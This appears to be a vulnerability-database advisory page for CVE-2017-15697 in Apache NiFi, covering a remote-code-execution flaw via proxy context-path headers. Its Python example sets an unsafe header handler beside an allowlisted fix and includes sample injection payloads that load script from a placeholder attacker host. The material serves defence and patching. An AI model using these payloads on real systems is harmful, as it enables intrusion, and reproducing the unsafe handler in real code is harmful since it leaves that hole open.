CVE-2017-15697
Description
A malicious X-ProxyContextPath or X-Forwarded-Context header containing external resources or embedded code could cause remote code execution. The fix to properly handle these headers was applied on the Apache NiFi 1.5.0 release. Users running a prior 1.x release should upgrade to the appropriate release.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Apache NiFi up to 1.4.x allows remote code execution via a malicious X-ProxyContextPath or X-Forwarded-Context header.
Vulnerability
Apache NiFi versions prior to 1.5.0 handle the X-ProxyContextPath and X-Forwarded-Context HTTP headers unsafely: a header value carrying external resources or embedded code is trusted by the NiFi web server and, according to the advisory, could lead to remote code execution. The advisory's wording points to the header value being incorporated into content NiFi serves, which is where reverse-proxy context-path headers are normally used, but the cited references do not describe the mechanism further or state whether authentication is required. The vulnerability affects all Apache NiFi 1.x releases before 1.5.0 [1][2].
Exploitation
An attacker with network access to a vulnerable Apache NiFi instance sends an HTTP request carrying a crafted X-ProxyContextPath or X-Forwarded-Context header whose value embeds external resources or code. The server processes the value without validation, which, per the advisory, can lead to code execution [1]. The cited references do not mention an authentication requirement for the request and give no further detail of how it must be formed.
Impact
Successful exploitation allows an attacker to achieve remote code execution (RCE) on the Apache NiFi server. This grants the attacker the ability to execute arbitrary commands or scripts with the privileges of the NiFi process, resulting in full compromise of the application and potentially the underlying host [2].
Mitigation
The vulnerability is fixed in Apache NiFi 1.5.0. Users running any prior 1.x release should upgrade to Apache NiFi 1.5.0 or later. The cited references describe no workaround [1][2]. Editorial note, not from the references: these headers only carry meaning when NiFi is deployed behind a reverse proxy, so an interim control is to have the front proxy overwrite or strip X-ProxyContextPath and X-Forwarded-Context on incoming client requests, and to confirm that a harmless marker value sent in those headers is not reflected in the response.
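The unsafe pattern the description implies, beside an allowlisted replacement, as an added example that is not Apache NiFi's code and is not taken from the cited references. Only the two header names come from the advisory; the allowlist policy, the path regex, the `<base href>` rendering and the sample requests are assumptions constructed for illustration, and attacker.example and nifi.internal.example are placeholder hostnames. NiFi 1.5.0 and later expose an operator allowlist for these headers in nifi.properties (nifi.web.proxy.context.path, per the NiFi administration guide rather than this page's references); the safe handler below follows the same allowlist idea.

```python
"""Allowlisted handling of reverse-proxy context-path headers.

Added example; not Apache NiFi code. It models the bug class the advisory
describes for CVE-2017-15697: a proxy header (X-ProxyContextPath or
X-Forwarded-Context) trusted verbatim and carried into content served to
clients. Only the two header names come from the advisory; the allowlist
policy, the regex and the sample requests below are assumptions.
"""
import html
import re
from typing import Dict, Mapping, Optional, Tuple

# Header names from the advisory; matched case-insensitively as HTTP requires.
CONTEXT_PATH_HEADERS = ("x-proxycontextpath", "x-forwarded-context")

# Assumed syntax for a context path: absolute path, path-safe characters only,
# no scheme, no quotes or angle brackets, no empty segments ("//").
_CONTEXT_PATH_RE = re.compile(r"^/(?:[A-Za-z0-9._~-]+/?)*$")

# Constructed sample requests (not captured traffic): an external base that
# would redirect relative resource loads, embedded markup, the one legitimate
# value a front proxy would send, and a request with no proxy header at all.
SAMPLE_REQUESTS: Dict[str, Dict[str, str]] = {
    "external-base": {"X-ProxyContextPath": "https://attacker.example"},
    "embedded-code": {"x-forwarded-context": '"><script src="https://attacker.example/x.js"></script>'},
    "legitimate": {"X-ProxyContextPath": "/nifi-proxy/"},
    "no-proxy-header": {"Host": "nifi.internal.example"},
}


def _header(headers: Mapping[str, str], name: str) -> Optional[str]:
    """Case-insensitive lookup of one header in a plain dict."""
    for key, value in headers.items():
        if key.lower() == name:
            return value
    return None


def unsafe_context_path(headers: Mapping[str, str]) -> str:
    """Modelled pre-fix behaviour: the first present header is used verbatim."""
    for name in CONTEXT_PATH_HEADERS:
        value = _header(headers, name)
        if value:
            return value
    return ""


def safe_context_path(headers: Mapping[str, str], allowlist: frozenset) -> str:
    """Hardened behaviour: the value must parse as a plain path and appear on
    the operator-configured allowlist. Anything else yields no context path,
    and a present-but-invalid header is not skipped in favour of the next one,
    so header ordering cannot be used to sneak a second value through."""
    for name in CONTEXT_PATH_HEADERS:
        value = _header(headers, name)
        if value is None:
            continue
        candidate = value.rstrip("/") or "/"
        if _CONTEXT_PATH_RE.match(candidate) and ".." not in candidate and candidate in allowlist:
            return candidate
        return ""
    return ""


def render_base_tag(context_path: str) -> str:
    """Models the point where the path reaches an HTML response. Output
    escaping stops markup injection but still honours an attacker-chosen
    external base, which is why validation has to happen on the way in."""
    return f'<base href="{html.escape(context_path, quote=True)}/nifi/">'


def triage(allowlist: frozenset) -> Dict[str, Tuple[str, str]]:
    """For each sample request, the path the unsafe and the safe handler would
    honour; handy for checking a policy against the constructed cases."""
    return {
        label: (unsafe_context_path(hdrs), safe_context_path(hdrs, allowlist))
        for label, hdrs in SAMPLE_REQUESTS.items()
    }


if __name__ == "__main__":
    policy = frozenset({"/nifi-proxy"})
    for label, (unsafe, safe) in triage(policy).items():
        print(f"{label:16} unsafe={unsafe!r:60} safe={safe!r}")
        if unsafe:
            print("  unsafe render:", render_base_tag(unsafe))
```

Running the file prints, for each constructed request, what each handler would honour and what the unsafe value looks like once rendered. The external-base case is the one to study: output escaping leaves `<base href="https://attacker.example/nifi/">` intact, so every relative script and stylesheet the page references would be fetched from the attacker's host, while the allowlisted handler returns no context path at all.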
AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Ecosystem | Affected versions | Patched versions |
|---|---|---|---|
| org.apache.nifi:nifi | Maven | >= 1.0.0, < 1.5.0 | 1.5.0 |
Affected products
- Apache Software Foundation / Apache NiFi, affected range 1.0.0 - 1.4.0
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
- https://github.com/advisories/GHSA-29ph-fjf3-c5cm (GitHub Security Advisory)
- https://nvd.nist.gov/vuln/detail/CVE-2017-15697 (NVD)
- https://nifi.apache.org/security.html (Apache NiFi security page, vendor confirmation)
News mentions
No linked articles in our index yet.